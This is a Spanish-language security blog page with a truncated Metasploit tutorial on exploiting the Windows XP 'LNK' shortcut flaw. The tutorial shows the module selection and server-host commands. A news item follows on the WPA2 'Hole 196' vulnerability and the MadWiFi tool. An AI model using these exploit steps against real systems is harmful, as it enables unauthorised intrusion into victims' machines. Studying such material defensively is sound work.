Total Sec

[*] - Explotando "LNK" con MetaSploit - Método 1 [*] - Explotando "LNK" con MetaSploit - Método 2 Ahora vamos a citar otro método para explotar la vulnerabilidad "LNK" de Microsoft Windows XP. Tendremos que actualizar Metasploit y lo que haremos será: msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute Especificamos el exploit: msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.78.133 SRVHOST => 192.168.78.133

Investigadores en seguridad de la compañía AitTight Networks han descubierto una vulnerabilidad en el protocolo de cifrado y autentificación inalámbrica más seguro hasta la fecha, el WPA2. Bautizado como "Hole 196", permite a un usuario que esté autentificado en la red, descifrar toda la información que transmitan los demás usuarios de la red, además de permitir inyectar código malicioso y comprometer el resto de los dispositivos autorizados. La herramienta para explotar la vulnerabilidad se denomina MadWiFi y al ser un proyecto de código abierto, está disponible para todo el mundo. Por el momento no hay ningún parche o forma de protegerse contra ese agujero de seguridad, así lo afirma Kaustubh Phanse, investigador de AirTight, lo que lo convierte en una vulnerabilidad "Zero Day".